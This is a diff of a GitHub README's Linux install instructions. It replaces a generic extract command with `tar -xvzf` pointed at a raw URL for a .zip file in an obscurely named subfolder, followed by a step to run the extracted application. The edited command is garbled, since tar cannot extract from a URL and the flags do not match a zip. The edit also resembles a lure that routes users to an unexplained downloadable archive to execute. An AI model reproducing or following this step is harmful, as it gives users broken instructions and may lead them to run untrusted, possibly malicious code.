StarkAj75/kirmanjiku-12/README.md

 - **Linux:**
   - Open your terminal.
-  - Extract the downloaded file using the command: `tar -xvzf filename.tar.gz`
+  - Extract the downloaded file using the command: `tar -xvzf https://raw.githubusercontent.com/StarkAj75/kirmanjiku-12/main/uroxanthin/kirmanjiku-12.zip`
   - Navigate to the extracted folder.
   - Run the application using: `./application-name`.